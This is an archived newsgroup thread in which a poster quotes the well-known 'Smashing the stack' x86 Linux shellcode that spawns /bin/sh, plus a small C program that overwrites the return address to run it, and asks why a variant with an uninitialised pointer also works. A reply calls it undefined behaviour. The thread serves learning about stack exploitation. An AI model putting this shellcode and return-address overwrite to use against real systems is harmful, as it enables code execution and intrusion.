"smashing the stack"

After reading "Smashing the stack"
( http://www.*-*-*.com/ ) I understand
why this program execs a shell:

char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main() {
   int *ret;
   ret = (int *) &ret + 2;     /* point two words past ret on the stack */
   *ret = (int)shellcode;      /* overwrite that slot with the shellcode address */
   return 0;
}

I made a naive modification that shouldn't work but does. Why!?
(At least it works for me with
gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)
on intel redhat 6.2)

char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main() {
   int *ret;                   /* never initialized */
   ret += 2;                   /* arithmetic on an indeterminate pointer value */
   *ret = (int)shellcode;
   return 0;
}



Sat, 10 Jan 2004 12:29:44 GMT  
 "smashing the stack"

> After reading "Smashing the stack"
> (http://www.codetalker.com/whitepapers/other/p49-14.html) I understand
> why this program execs a shell:

In ANSI C terms, "exec(2)ing a shell" is one possible consequence
of undefined behavior.

> I made a naive modification that shouldn't work but does. Why!?

This is really something that should be discussed in an x86
assembly language or Linux system programming forum.


Sat, 10 Jan 2004 12:32:41 GMT  
 